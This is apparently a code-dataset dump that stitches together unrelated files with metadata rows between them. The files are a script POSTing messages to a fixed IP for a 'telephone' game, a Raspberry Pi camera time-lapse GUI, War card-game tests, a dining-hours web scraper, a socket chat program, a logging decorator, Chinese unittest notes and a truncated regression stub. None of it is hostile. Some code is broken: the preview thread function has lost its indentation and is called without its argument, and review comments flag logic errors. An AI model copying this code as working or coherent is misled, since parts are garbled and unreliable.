    quote characters (and silently deleted them from the message).
    """
    return json.dumps({"message": ", ".join(args)})

if __name__ == '__main__':
    headers = {'Content-type': 'application/json'}
    json_string = build_payload(sys.argv[1:])
    print(len(json_string))
    # POST the payload to the telephone endpoint and report the HTTP status.
    r = requests.post("http://67.166.103.221:60916/telephone/", data=json_string, headers=headers)
    print(r.status_code)
| true |
5311273b7d6dbf457da83c2bcc83695400f152d9 | Python | Supercap2F/PiCAM | /src/PiCAM3.py | UTF-8 | 5,212 | 2.671875 | 3 | [] | no_license | from Tkinter import *
import ttk
import threading
from picamera import PiCamera
import tkMessageBox
class App:
    """Tkinter UI for a Raspberry Pi time-lapse recorder (Python 2 / Tkinter)."""

    def __init__(self,master):
        # Build the static widget layout: preview image, two validated
        # numeric entries, Quit/Start buttons and a progress bar.
        #self.grid();
        # Make a canvas where a camera preview will be
        #self.CanvasPreview = Canvas(master,width=200,height=200);
        #self.CanvasPreview.grid(row=0, column=0, rowspan=10);
        photo = PhotoImage(file="img.gif");
        self.ImagePreview = Label(master, image=photo,width=200,height=200);
        self.ImagePreview.photo = photo;  # keep a reference so Tk doesn't GC it
        self.ImagePreview.grid(row=0, column=0, rowspan=50, padx=10, pady=30, sticky=N);
        # add a status bar
        #self.StatusBar = Label(master, text="Please enter Values:");
        #self.StatusBar.grid(row=0, column=1, columnspan=2);
        # Validation callback with the full set of Tk percent substitutions.
        vcmd = (master.register(self.validate), '%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')
        # add the frames label
        self.FramesLabel=Label(master, text="Frames");
        self.FramesLabel.grid(row=0, column=1, columnspan=2, sticky=SW);
        # add the frames input
        self.FramesEntry=Entry(master,validate = 'key', validatecommand = vcmd);
        self.FramesEntry.grid(row=1, column=1, columnspan=2,padx=(0, 10));
        # add the interval label
        self.IntervalLabel=Label(master, text="Interval (in sec)");
        self.IntervalLabel.grid(row=2, column=1, columnspan=2, sticky=SW);
        # add the interval input
        self.IntervalEntry=Entry(master,validate = 'key', validatecommand = vcmd);
        self.IntervalEntry.grid(row=3, column=1, columnspan=2,padx=(0, 10));
        # add the quit button
        self.QuitButton = Button(master,text="Quit",command=master.quit);
        self.QuitButton.grid(row=4, column=1, sticky=E+W);
        # add the start button
        self.StartButton = Button(master,text="Start", command=self.StartRecording);
        self.StartButton.grid(row=4, column=2, sticky=E+W,padx=(0, 10));
        # add a progress bar
        self.ProgressBar = ttk.Progressbar(master, orient="horizontal", maximum=100 ,length=200, mode="determinate");
        self.ProgressBar.grid(row=5, column=0, columnspan=3, sticky=W+E, padx=10);
        self.ProgressBar["value"] = 50;
        # Let every row/column stretch with the window.
        master.grid_columnconfigure(0,weight=1)
        master.grid_columnconfigure(1,weight=1)
        master.grid_columnconfigure(2,weight=1)
        master.grid_rowconfigure(0,weight=1)
        master.grid_rowconfigure(1,weight=1)
        master.grid_rowconfigure(2,weight=1)
        master.grid_rowconfigure(3,weight=1)
        master.grid_rowconfigure(4,weight=1)
        master.grid_rowconfigure(5,weight=1)
        master.grid_rowconfigure(6,weight=1)

    def StartRecording(self):
        # Read and validate the two entries, lock the UI and start capturing.
        if(self.FramesEntry.get()=="" or self.IntervalEntry.get()==""):
            tkMessageBox.showwarning("No input","Please fill in all fields");
            return;
        s=self.FramesEntry.get();
        self.CameraTotalFrames=int(s)
        f=self.IntervalEntry.get();
        # NOTE(review): the label says "Interval (in sec)" but this value is
        # passed straight to root.after(), which takes milliseconds — the
        # interval appears to be 1000x too short; confirm intent.
        self.CameraInterval=int(f)
        self.CameraCount=0;
        self.FramesEntry.config(state=DISABLED);
        self.IntervalEntry.config(state=DISABLED);
        self.StartButton.config(state=DISABLED);
        self.ImagePreview.focus(); #focus on a random widget
        print self.CameraInterval
        print self.CameraTotalFrames
        self.camera.resolution = (1080,720);
        # NOTE(review): 'Preview' is a local that is discarded immediately;
        # it does not affect the preview thread.
        Preview=False;
        self.CaptureFrames();

    def CaptureFrames(self):
        # Capture one frame, then reschedule itself via root.after() until
        # the requested number of frames has been taken.
        if self.CameraCount < self.CameraTotalFrames:
            self.camera.capture('./lapse/img%03d.jpg' % self.CameraCount);
            print('Captured img%03d.jpg' % self.CameraCount);
            self.CameraCount+=1;
            root.after(self.CameraInterval, self.CaptureFrames);
        else:
            print "test"
            # Done: unlock the UI.
            self.FramesEntry.config(state=NORMAL);
            self.IntervalEntry.config(state=NORMAL);
            self.StartButton.config(state=NORMAL);
            # NOTE(review): local 'Preview' again has no effect (see above).
            Preview=True;

    # function to check input to make sure the value is only numbers
    def validate(self, action, index, value_if_allowed, prior_value, text, validation_type, trigger_type, widget_name):
        # Tk key-validation hook: action '1' means an insertion is pending.
        # NOTE(review): a warning dialog pops up on every rejected keystroke,
        # which may be intrusive.
        if(action=='1'):
            if text in '0123456789.-+':
                try:
                    float(value_if_allowed)
                    return True
                except ValueError:
                    tkMessageBox.showwarning("Invalid Entry","Please enter only numbers");
                    return False
            else:
                tkMessageBox.showwarning("Invalid Entry","Please enter only numbers");
                return False
        else:
            return True
# Build the UI, go fullscreen and attach the Raspberry Pi camera.
root=Tk();
app=App(root);
root.attributes("-fullscreen",True); # fullscreen app
#app.IntervalEntry.focus(); # make sure the app has the focus
app.camera = PiCamera(); # setup the camera
def thread1(self):
self.preview=True;
while True:
if(self.preview):
app.camera.resolution = (200,200);
app.camera.capture('preview.gif');
photo = PhotoImage(file="preview.gif");
app.ImagePreview.config(image=photo);
app.ImagePreview.photo=photo;
t = threading.Thread(target=thread1)
t.start()
t.preview=False;
#root.after(0,UpdatePreview);
root.mainloop();
root.destroy();
| true |
fe6e9123eeaa721958248e20ef6c5fbac069aa0a | Python | knakamor/projects | /OOP/src/test_war.py | UTF-8 | 1,595 | 3.390625 | 3 | [] | no_license | import nose.tools as n
from deck import Card
from war import War
from war_player import Player
def test_player_init():
    """A fresh player holds no cards and cannot play one."""
    rookie = Player("name")
    n.assert_equal(len(rookie), 0)
    n.assert_is_none(rookie.play_card())
def test_player_receive_play():
    """Receiving a card grows the hand; playing it empties the hand again."""
    holder = Player("name")
    jack = Card("J", "c")
    holder.receive_card(jack)
    n.assert_equal(len(holder), 1)
    n.assert_equal(holder.play_card(), jack)
    n.assert_equal(len(holder), 0)
def test_war_deal():
    """Dealing splits the 52-card deck evenly between both players."""
    match = War(human=False)
    n.assert_equal(len(match.player1), 26)
    n.assert_equal(len(match.player2), 26)
def test_play_round():
    """No cards are created or lost by playing a single round."""
    match = War(human=False)
    match.play_round()
    n.assert_equal(len(match.player1) + len(match.player2), 52)
def test_play_game():
    """A finished game conserves all 52 cards, names a winner, and leaves the loser empty-handed."""
    match = War(human=False)
    match.play_game()
    n.assert_equal(len(match.player1) + len(match.player2) + len(match.pot), 52)
    n.assert_is_not_none(match.winner)
    loser = match.player2 if match.player1.name == match.winner else match.player1
    n.assert_equal(len(loser), 0)
def test_war_size():
    """A war with war_size=5 puts 5 cards from each player into the pot."""
    match = War(war_size=5, human=False)
    match.play_round()  # play first to shuffle the hands
    match.war()
    n.assert_equal(len(match.pot), 10)
def test_play_two_of_three():
    """Best-of-three: win counts start at zero, someone reaches 2, no cards leak."""
    match = War(human=False)
    # The game should expose a dictionary tracking win counts.
    n.assert_equal(max(match.win_counts.values()), 0)
    match.play_two_of_three()
    n.assert_equal(max(match.win_counts.values()), 2)
    # Make sure we do not end up with too many cards!
    n.assert_equal(len(match.player1) + len(match.player2) + len(match.pot), 52)
| true |
78bcb9864ee620ae3b9f2ab23854cb8b5f0d69f6 | Python | vikas456/uteats | /parser.py | UTF-8 | 6,442 | 2.59375 | 3 | [] | no_license | from datetime import datetime
from urllib2 import urlopen as uReq
from bs4 import BeautifulSoup as soup
from flask import Flask, render_template, url_for
# Flask app; disable static-file caching so edited templates/assets reload immediately.
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
@app.route("/")
def main():
time = str(datetime.now().time().hour)
day = datetime.today().weekday()
dining_url = 'http://housing.utexas.edu/dining/hours'
uClient = uReq(dining_url)
page_html = uClient.read()
uClient.close()
page_soup = soup(page_html, "html.parser")
containers = page_soup.findAll("table",{"class": "tablesaw tablesaw-stack"})
openPlaces = []
times = []
places = []
data = []
for container in containers:
day_values = container.tbody.findAll("tr")
place = ""
for val in day_values:
if val.th is not None: # Ex. J2 Dining
place = val.th
places.append(place.text.strip())
day_info = val.findAll("td")
days = []
isTime = 0
timeLeft = 0
timesRange = ""
dayRange = ""
for temp in day_info:
text = temp.text.strip()
if (len(text) != 0): # avoid spaces under days
if (text[0].isdigit() or text == "Closed" or text[0] == "N"): # time ranges
timesRange = text
isTime = checkTime(text, time)
else:
dayRange = text
days = checkDay(text)
if (len(days) > 0 and -1 not in days):
if (day in days and isTime == 1):
data.append({"name": place.text.strip()})
sac(time, data)
union(time, data)
print data
return render_template('index.html', data=data)
def sac(currTime, data):
    """Scrape the SAC hours table and append venues open at hour `currTime` to `data`."""
    tracked = ["Chick-fil-A", "P.O.D.", "Starbucks", "Taco Cabana", "Zen"]
    today = datetime.today().weekday()
    page = uReq('https://universityunions.utexas.edu/sac-hours/fall-2019')
    markup = page.read()
    page.close()
    parsed = soup(markup, "html.parser")
    tables = parsed.findAll("table",{"class": "tablesaw tablesaw-stack"})
    rows = tables[2].tbody.findAll("tr")
    for row in rows:
        cells = row.findAll("td")
        name = cells[0].text.strip()
        # Normalize the "P.O.D. ..." row to its short name.
        if name[:6] == "P.O.D.":
            name = "P.O.D."
        # NOTE(review): cells[today] reuses the name cell when today == 0
        # (Monday); the day columns may start at index 1 -- confirm against
        # the page layout.
        if name in tracked and checkSacTime(cells[today].text.strip(), currTime) == 1:
            data.append({"name": name})
def union(currTime, data):
    """Scrape the Texas Union hours table and append venues open at hour
    `currTime` to `data` (mutated in place)."""
    unionRestaurants = ["Starbucks", "Chick-Fil-A", "P.O.D.", "Quiznos", "MoZZo", "Panda Express", "Field of Greens Market Place", "Wendy's @ Jester", "Java City @ PCL"]
    dayIndex = datetime.today().weekday()
    dining_url = 'https://universityunions.utexas.edu/union-hours/fall-2019'
    uClient = uReq(dining_url)
    page_html = uClient.read()
    uClient.close()
    page_soup = soup(page_html, "html.parser")
    containers = page_soup.findAll("table",{"class": "tablesaw tablesaw-stack"})
    locations = containers[0].tbody.findAll("tr")
    for location in locations:
        times = location.findAll("td")
        name = times[0].text.strip()
        # Bug fix: the original sliced only 3 characters (`name[:3]`) and
        # compared them to the 4-character literal "Prov", which can never be
        # equal, so the Provisions-on-Demand row was never normalized.
        if (name[:4] == "Prov"):
            name = "P.O.D."
        if (name in unionRestaurants):
            # Bug fix: append venues that are OPEN (checkUnionTime returns 1),
            # consistent with sac(); the original inverted this and appended
            # closed venues (== 0).
            # NOTE(review): times[dayIndex] reuses the name cell when
            # dayIndex == 0 (Monday); the day columns may start at index 1 --
            # confirm against the page layout.
            if (checkUnionTime(times[dayIndex].text.strip(), currTime) == 1):
                data.append({"name": name})
def checkUnionTime(text, currTime):
    """Return 1 when hour `currTime` falls strictly inside the Union hours
    range in `text` (e.g. "7am - 10pm", "Noon - 8pm"), else 0.

    Both the opening and the closing hour themselves count as closed.
    """
    if text == "Closed":
        return 0
    parts = text.split(" ")
    opening, closing = parts[0], parts[2]
    # Opening hour: "10..." and "11..." are read off the second digit,
    # "Noon" is 12, otherwise a single-digit hour (+12 when pm).
    if opening[1] == "0":
        opens = 10
    elif opening[1] == "1":
        opens = 11
    elif opening[0] == "N":
        opens = 12
    elif opening[-2] == "a":
        opens = int(opening[0])
    else:
        opens = int(opening[0]) + 12
    # Closing hour: "10pm" -> 22, "11pm" -> 23, otherwise single digit
    # (+12 when pm).
    if closing[1] == "0":
        closes = 22
    elif closing[1] == "1":
        closes = 23
    elif closing[-2] == "a":
        closes = int(closing[0])
    else:
        closes = int(closing[0]) + 12
    return 1 if opens < int(currTime) < closes else 0
def checkSacTime(text, currTime):
    """Return 1 when hour `currTime` falls strictly inside the SAC hours
    range in `text` (e.g. "7:00am - 10:00pm"), else 0.

    Bug fix: `currTime` arrives as a *string* from the caller and was being
    compared directly against the integer hours; under Python 2's cross-type
    ordering that comparison never succeeds, so the check always reported
    "closed".  Cast to int, matching checkTime() and checkUnionTime().
    """
    if text == "Closed":
        return 0
    split = text.split(" ")
    startTime = split[0]
    endTime = split[2]
    # "1x:..." opening means 10 o'clock; otherwise single-digit hour (+12 for pm).
    start = 10 if startTime[1] != ":" else int(startTime[0]) if startTime[-2] == "a" else int(startTime[0]) + 12
    # Closing: am keeps the digit, "x:..."pm adds 12, "1x:..."pm reads two digits.
    end = int(endTime[0]) if endTime[-2] == "a" else int(endTime[0]) + 12 if endTime[1] == ":" else int(endTime[:2]) + 12
    if (int(currTime) > start and int(currTime) < end):
        return 1
    return 0
def checkTime(text, currTime):
    """Return 1 when hour `currTime` falls inside the housing-dining hours
    range in `text` (e.g. "7 a.m. - 10 p.m.", "Noon - 8 p.m."), else 0.

    The opening hour is inclusive, the closing hour exclusive.
    """
    if text == "Closed":
        return 0
    tokens = text.split(" ")
    opens = 12 if tokens[0] == "Noon" else int(tokens[0])
    if tokens[1] == "p.m.":
        # convert to 24-hour time
        opens = opens + 12
    closes = int(tokens[-2])
    if tokens[-1] == "p.m.":
        closes = closes + 12
    return 1 if opens <= int(currTime) < closes else 0
def checkDay(text):
    """Translate a day-range string into a list of weekday indices.

    Accepts a single day ("Monday"), a dash range ("Monday - Friday"),
    or a pair joined by "and"/"&".  Unknown names map to -1 via
    getDayIndex().
    """
    tokens = text.split(" ")
    indices = []
    if len(tokens) == 1:
        indices.append(getDayIndex(tokens[0]))
    elif "-" in tokens:
        indices.extend(range(getDayIndex(tokens[0]), getDayIndex(tokens[2]) + 1))
    elif "and" in tokens or "&" in tokens:
        indices.append(getDayIndex(tokens[0]))
        indices.append(getDayIndex(tokens[2]))
    return indices
def getDayIndex(text):
    """Translate an English weekday name to its 0-based index (Monday == 0);
    return -1 for anything unrecognized."""
    weekdays = {
        "Monday": 0,
        "Tuesday": 1,
        "Wednesday": 2,
        "Thursday": 3,
        "Friday": 4,
        "Saturday": 5,
        "Sunday": 6,
    }
    return weekdays.get(text, -1)
# Current hour as a string; also handy for the ad-hoc calls kept below.
time = str(datetime.now().time().hour)
# union(time, [])
# sac(time, [])
# main()
if __name__ == '__main__':
app.run(debug=True) | true |
8ea00784102a8d3db6cc189f2d0c805ebbcce92c | Python | kingdelee/LeePy | /PyQT5/MyPyqtTest/singal/up/t4.py | UTF-8 | 1,329 | 3.21875 | 3 | [] | no_license | import sys
from PyQt5.QtWidgets import *
from functools import partial
class WinForm(QMainWindow):
    """Demo window: two buttons wired to a single slot via functools.partial."""

    def __init__(self, parent=None):
        super(WinForm, self).__init__(parent)
        # Two push buttons that share one handler.
        first_button = QPushButton('Button1')
        second_button = QPushButton('Button2')
        # partial() binds the button number as the slot argument
        # (a default-argument lambda would work equally well).
        first_button.clicked.connect(partial(self.onButtonClick, 1))
        second_button.clicked.connect(partial(self.onButtonClick, 2))
        # Lay the buttons out horizontally inside a container widget and make
        # that container the central widget of the main window.
        container = QWidget()
        row = QHBoxLayout(container)
        row.addWidget(first_button)
        row.addWidget(second_button)
        self.setCentralWidget(container)

    def onButtonClick(self, n):
        # Echo which button fired, then pop up an information box.
        print("Button {0}".format(n))
        QMessageBox.information(self, '信息提示框', 'Button {0}'.format(n))
if __name__ == '__main__':
    # Standard Qt bootstrap: create the application, show the window,
    # and hand control to the event loop until the window closes.
    app = QApplication(sys.argv)
    form = WinForm()
    form.show()
    sys.exit(app.exec_())
| true |
704762ea8c4e69dc812925ec1ffbe38e850adb7b | Python | EdgarHE/Iot-Design | /PiChat.py | UTF-8 | 2,127 | 3.046875 | 3 | [] | no_license | #!python2
import thread
import time
import SocketServer
import socket
import sys
class MyTCPHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our server.
    It is instantiated once per connection to the server, and must
    override the handle() method to implement communication to the
    client.
    """
    def handle(self):
        # self.request is the TCP socket connected to the client
        # Expected payload: semicolon-separated "key:value" pairs, e.g.
        # "temp:21;lum:300;".  Unknown keys are ignored; defaults are 0.
        A = {}
        A['temp'] = 0
        A['lum']=0
        self.data = self.request.recv(1024).strip()
        tmp = self.data
        # Trailing ';' produces one empty chunk, hence the -1.
        length = len(tmp.split(';'))-1
        for i in range(0, length):
            # NOTE(review): tmp.split(';') is recomputed on every access;
            # splitting once outside the loop would be cheaper.
            if tmp.split(';')[i].split(':')[0] == 'temp':
                A['temp'] = int(tmp.split(';')[i].split(':')[1])
            if tmp.split(';')[i].split(':')[0] == 'lum':
                A['lum'] = int(tmp.split(';')[i].split(':')[1])
        print 'temp: %d' %A['temp']
        print 'lum: %d' %A['lum']
        #print 'length: %d'%length
        #print tmp
        #print '{} :{}'.format(self.client_address[0], self.data)
# Define the server function for the thread
def server_thread(HOST, PORT):
    """Run a blocking TCP server on (HOST, PORT); never returns."""
    server = SocketServer.TCPServer((HOST, PORT), MyTCPHandler)
    print "The server start at port %s" % ( PORT )
    server.serve_forever()
# Define the client function for the thread
def client_thread( HOST, PORT):
    """Read lines from stdin forever and send each to (HOST, PORT) over a
    fresh TCP connection per message."""
    # Create a socket (SOCK_STREAM means a TCP socket)
    print 'Ready to connect to %s' % (HOST)
    print ''
    raw_input("Press enter to begin connection")
    while True:
        data = user_input = raw_input()
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            # Connect to server and send data
            sock.connect((HOST, PORT))
            sock.sendall(data + "\n")
            # Receive data from the server and shut down
            #received = sock.recv(1024)
        finally:
            # Always release the socket, even if connect/send failed.
            sock.close()
#MAIN
# Peer-to-peer chat: run a server locally and a client pointed at the peer
# given on the command line; both run as daemon-style threads.
HOST = ''
PORT = 8888
if len(sys.argv) != 2:
    # NOTE(review): the usage string is missing its closing '>'.
    print "Usage: python PiChat <Destination IP"
    exit(0)
try:
    thread.start_new_thread( server_thread, (HOST, PORT, ) )
    thread.start_new_thread( client_thread, (sys.argv[1], PORT, ) )
except:
    # NOTE(review): bare except hides the actual error; also this only
    # catches failures to *start* the threads, not failures inside them.
    print "Error: unable to start thread"
# Busy-wait to keep the main thread (and thus the process) alive.
# NOTE(review): burns a full CPU core; time.sleep in the loop would be kinder.
while 1:
    pass
| true |
1829321bf3757b19cdc896b38b7fcdfae0301d3c | Python | jiax1994/Physics-simulations | /lab3/fig.py | UTF-8 | 2,098 | 4.125 | 4 | [] | no_license | '''ceci est un programme qui calcule et affiche les positions de y en fonction de x selon les différents angles, il y a deux graphiques
'''
#importation de module numpy et la librairie matplotlib
import numpy as np
import matplotlib.pyplot as plt
def trajectoire(v0, theta, pas):
    """Sample the ballistic trajectory of a projectile launched at speed
    `v0` and angle `theta` (degrees), using `pas` time steps.

    Returns (x, y, t, Tf): horizontal and vertical positions, the sample
    times, and the total time of flight Tf = 2*v0*sin(theta)/g.
    """
    g = 9.8
    angle = np.deg2rad(theta)
    # Total flight time (back to y = 0), then sample times every Tf/pas.
    Tf = 2 * v0 * np.sin(angle) / g
    t = np.arange(0, Tf, Tf / pas)
    # Uniform motion horizontally, uniformly accelerated motion vertically.
    x = v0 * t * np.cos(angle)
    y = v0 * t * np.sin(angle) - g * t ** 2 / 2
    return x, y, t, Tf
def monotone_croissant(d):
    """Return True when the sequence `d` is strictly increasing.

    On the first non-increasing step, print the offending value (for the
    current global `theta`) and return False.  Sequences with fewer than
    two elements are vacuously increasing; the original crashed on them
    with an UnboundLocalError because its result variable was only ever
    assigned inside the loop.
    """
    for i in range(len(d) - 1):
        if d[i] < d[i + 1]:
            continue
        # NOTE(review): `theta` is a module-level global set by the plotting
        # loop below; calling this outside that loop raises NameError on a
        # decreasing sequence.
        print('la courbe est décroissant à ', d[i + 1], 'pour un angle de ', theta)
        return False
    return True
# List of launch angles to compare (degrees).
thetatab=[30,35,40,45,50,55,60,65,70,75,80]
# One figure holding two side-by-side plots.
plt.figure(1,figsize=(8.,4.),dpi=100)
# Draw one curve per launch angle.
for theta in thetatab:
    # Compute the trajectory and bundle the results into an array.
    # NOTE(review): (x, y, t, Tf) mixes arrays with the scalar Tf, so
    # np.asarray builds a ragged/object array; recent NumPy rejects this.
    f=trajectoire(15,theta,500)
    f=np.asarray(f)
    # Left plot: trajectory y(x).
    plt.subplot(1,2,1)
    plt.plot(f[0],f[1] ,'b')
    plt.xlabel('x')
    plt.ylabel('y')
    # Distance from the launch point at each sample.
    d=((f[0]**2)+(f[1]**2))**0.5
    # Check whether the distance grows monotonically (prints when it doesn't).
    r=monotone_croissant(d)
    # Normalized time t/Tf in [0, 1).
    t=f[2]/f[3]
    # Right plot: distance versus normalized time.
    plt.subplot(1,2,2)
    plt.plot (t,d,'g',label=theta)
    plt.xlabel('t/Tf')
    plt.ylabel('d')
plt.show()
| true |
052e63527e59231b4bc36c311a11c0e6ce8bc5c5 | Python | mfmakahiya/empath-on-movie-reviews | /python scripts/empath on movie reviews.py | UTF-8 | 2,757 | 2.890625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
###############################################################################
# This script applies empath on movie reviews
###############################################################################
# Load libraries
import os
import logging
from empath import Empath
import pandas as pd
# Set up folder locations
# Build the absolute path of each reviewer folder to scan; only one reviewer
# is enabled here (the rest are commented out in folder_list).
source_folder_path_list = []
source_folder_path = "C:/Users/Marriane/Documents/GitHub/empath-on-movie-reviews/data/input/scale_whole_review.tar (with text)/scale_whole_review/scale_whole_review/"
folder_list = ["Dennis+Schwartz/txt.parag"] #, "James+Berardinelli/txt.parag", "Scott+Renshaw/txt.parag", "Steve+Rhodes/txt.parag"]
for folder in folder_list:
    folder_loc = source_folder_path + folder
    source_folder_path_list.append(folder_loc)
print(source_folder_path_list)
###############################################################################
## Program Logic
###############################################################################
if __name__ == "__main__":
lexicon = Empath()
result = lexicon.analyze("the quick brown fox jumps over the lazy dog", normalize=True)
df0 = pd.Series(result, name = 'KeyValue')
col_names = df0.keys()
df = pd.DataFrame(columns=col_names)
for folder in source_folder_path_list:
txt_list = []
for file in os.listdir(folder):
if file.endswith(".txt"):
txt_list.append(file)
for txt_i in txt_list:
txt_file_name = txt_i
logging.getLogger().setLevel(logging.INFO)
logging.info("Converting " + txt_i)
txt_full_path = os.path.join(folder, txt_file_name)
try:
txt_file = open(txt_full_path, 'r')
lines = txt_file.readlines()
lexicon = Empath()
result = lexicon.analyze(lines, normalize=True)
new_result = pd.Series(result, name = txt_full_path)
new_result.index.name = 'Key'
new_result.reset_index()
df = df.append(new_result)
logging.info(txt_i, " successfully analyzed")
except:
logging.info(txt_i + " open failed")
df = df.dropna()
# Clean the data frame
df['Details'] = df.index
df['Reviewer'] = df['Details'].str.split("/").str[11]
df['Text file'] = df['Details'].str.split("/").str[12]
df = df.set_index(['Reviewer', 'Text file'])
df = df.drop(['Details'], axis = 1)
df.to_csv('./data/output/Empath-on-movie-reviews_results.csv', sep=',', encoding='utf-8')
| true |
12f9ed119a12ec6503a1fd579cb5d8469e4ed616 | Python | 10bddoolittle/LEDGrid | /Display_Module.py | UTF-8 | 1,855 | 3.34375 | 3 | [] | no_license | import time
from Display.GPIOModule import GPIOModule
from Display.LEDArray import LEDArray
class Display:
    """Drive a multiplexed LED grid: one row is lit at a time and rows are
    cycled quickly enough that the whole pattern appears persistent."""
    #active_cols = []
    def __init__(self,rowgpios,colgpios):
        # One GPIO pin name per row/column line of the LED matrix.
        self.numrows = len(rowgpios)
        self.numcols = len(colgpios)
        self.led_array = LEDArray(self.numrows, self.numcols)
        self.gpio_module = GPIOModule(rowgpios,colgpios)
    def outputPattern(self):
        """Advance to the next row and drive its column pattern."""
        # turn off current row
        self.gpio_module.deactivateRow()
        # shifting the circular queues
        # NOTE(review): rowgpios/rowindices appear to be circular queues kept
        # in lock-step; .shift() presumably rotates both by one -- confirm in
        # GPIOModule/LEDArray.
        self.gpio_module.rowgpios.shift()
        self.led_array.rowindices.shift()
        # getting the new set of active columns
        active_cols = self.led_array.getActiveColumns(self.led_array.getRowIndex())
        # Outputting Values to the LED Grid Hardware
        self.gpio_module.outputColumns(active_cols)
        # Activate the new row
        self.gpio_module.activateRow()
    '''
    run time - time displays
    update time - flickering time
    '''
    def run(self, array, run_time, update_time):
        """Show `array` for `run_time` seconds, refreshing one row every
        `update_time` seconds (smaller update_time = less visible flicker)."""
        dt = 0
        self.led_array.updateArray(array)
        timestart = time.time()
        while dt < run_time:
            self.outputPattern()
            time.sleep(update_time)
            dt = time.time()-timestart
if __name__ == "__main__":
rowgpios = ["P8_10","P8_12"]
colgpios = ["P8_14","P8_16"]
display = Display(rowgpios,colgpios)
while True:
array_1 = [[1, 0],
[0, 0]]
array_2 = [[0, 1],
[0, 0]]
array_3 = [[0, 0],
[1, 0]]
array_4 = [[0, 0],
[0, 1]]
display.run(array_1, 2, .01 )
display.run(array_2, 2 ,.01)
display.run(array_3, 2 ,.01)
display.run(array_4, 2 ,.01)
# while True:
# time.sleep(.01)
# display.run()
| true |
47c12e07691391859faf0e25297030cf40fb1908 | Python | JeffDing/Python_Music | /utils/Decorator.py | UTF-8 | 528 | 2.84375 | 3 | [] | no_license | from functools import wraps
import re
import time
def Count(func, *args, **kwargs):
    """Decorator that logs each music playback before delegating to `func`.

    A timestamped line "<YYYY-mm-dd HH:MM:SS>\\t<track name>" is appended to
    log.txt, where the track name is the last backslash-separated component
    of the path handed to the wrapped function.
    """
    @wraps(func)
    def wrapper(path, *inner_args, **inner_kwargs):
        stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
        track = re.split(r"\\", path)[-1]
        with open("log.txt", "a") as f:
            f.write(stamp + "\t" + track + "\n")
        func(path, *inner_args, **inner_kwargs)
    return wrapper
1f2b1c8cd974c8713d0c223c2fc173c8da062a0b | Python | Fangziqiang/AppiumTesting | /src/unitTest使用方法.py | UTF-8 | 5,094 | 3.484375 | 3 | [] | no_license | #unittest培训后总结记录
今天在给同学们上了自动化测试单元框架unittest之后,突发奇想,要总结下自己今天上的课程内容。于是有了下面的一幕:
首先,今天上课的目标是要学会关于unittest框架的基本使用及断言、批量执行。
第一个,unittest是什么:
为了让单元测试代码能够被测试和维护人员更容易地理解,最好的解决办法是让开发人员遵循一定的规范来编写用于测试的代码,
所以说unittest就随机缘而生,又因为用的人多了,所以逐渐的变成了python的单元测试标准。unittest单元测试框架不仅可以适
用于单元测试,还可以适用WEB自动化测试用例的开发与执行,该测试框架可组织执行测试用例,并且提供了丰富的断言方法,判断测试
用例是否通过,最终生成测试结果。
第二个,unittest类和方法的简介:
(注:所有的测试用例需要使用test开头作为用例名称)
unittest.TestCase:所有测试用例类必须继承TestCase类。
TestCase.setUp():setUp()方法用于测试用例执行前的初始化工作。例如可以初始化driver对象,可以新建数据库访问对象,可以存放公共变量等。
TestCase.tearDown():tearDown()方法用于测试用例执行之后的善后工作。如关闭浏览器,关闭数据库连接等。
TestCase.assert*():assert是一些断言方法:在执行测试用例的过程中,最终用例是否执行通过,是通过判断测试得到的实际结果和预期结果是否相
等决定的。(常用的断言有:assertEqual,assertIs,assertIn等)
unittest.skip():装饰器,当运行用例时,有些用例可能不想执行等,可用装饰器暂时屏蔽该条测试用例。
unittest.main():main()方法使用TestLoader类来搜索所有包含在该模块中以“test”命名开头的测试方法,并自动执行他们。执行方法的默认顺序
是:根据ASCII码的顺序加载测试用例,数字与字母的顺序为:0-9,A-Z,a-z。所以以A开头的测试用例方法会优先执行,以a开头会后执行。
unittest.TestSuite():TestSuite()类是用来创建测试集的。
unittest.TestSuite().addTest():addTest()方法是将测试用例添加到测试集合中。
unittest.defaultTestLoader.discover():通过defaultTestLoader的discover()方法可自动根据测试目录start_dir匹配查找测试用例
文件(test*.py),并将查找到的测试用例组装到测试套件,因此可以直接通过run()方法执行discover。
unittest.TextTestRunner():通过该类下面的run()方法来运行suite所组装的测试用例,入参为suite测试套件。
第三,进行代码unittest实践:
具体实现代码如下:
新建Test_baidu测试类:
import unittest
from selenium import webdriver
class testBaidu1(unittest.TestCase):
# 添加setup进行初始化工作
def setUp(self):
self.driver = webdriver.Firefox()
# 测试用例使用test开头
def testbaidu(self):
self.driver.get("http://www.baidu.com")
self.driver.find_element_by_id("kw").send_keys("selenium")
self.driver.find_element_by_id("su").click()
text = self.driver.find_element_by_xpath(".//*[@id='1']/h3/a").get_attribute("text")
print(text)
# 断言判断文本是否存在于页面中
self.assertIn("Web Browser Automation",text)
def testbaidu1(self):
self.driver.get("http://www.baidu.com")
self.driver.find_element_by_id("kw").send_keys("selenium")
self.driver.find_element_by_id("su").click()
text = self.driver.find_element_by_xpath(".//*[@id='1']/h3/a").get_attribute("text")
# 断言判断文本是否存在于页面中
self.assertIn("Web Browser Automation",text)
# 添加teardown进行善后处理
def tearDown(self):
self.driver.quit()
# 添加测试集合
suit = unittest.TestSuite()
suit.addTest(testBaidu1("testbaidu"))
suit.addTest(testBaidu1("testbaidu1"))
if __name__ == '__main__':
# 使用main()方法进行运行用例
# unittest.main()
# 使用 run放进行运行测试用例集
run = unittest.TextTestRunner()
run.run(suit)
新建 run_all_case类:
import os
import unittest
# 添加用例搜索目录
case_path = os.path.join(os.getcwd(),"case")
def all_case():
# 使用discover进行自动搜索测试集
discover = unittest.defaultTestLoader.discover(case_path,
pattern="Test*.py",
top_level_dir=None
)
print(discover)
return discover
if __name__ == '__main__':
# 使用run方法运行测试集
run = unittest.TextTestRunner()
run.run(all_case())
| true |
68be00ab15037580f7965d61ee75aaea25b03e7c | Python | saw1998/ML-from-scratch | /decision_tree/17CH10065_ML_A2/Task2/Task2_A.py | UTF-8 | 1,700 | 3.1875 | 3 | [] | no_license | #!/usr/bin/env python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# Batch-gradient-descent logistic regression on the wine-quality dataset.
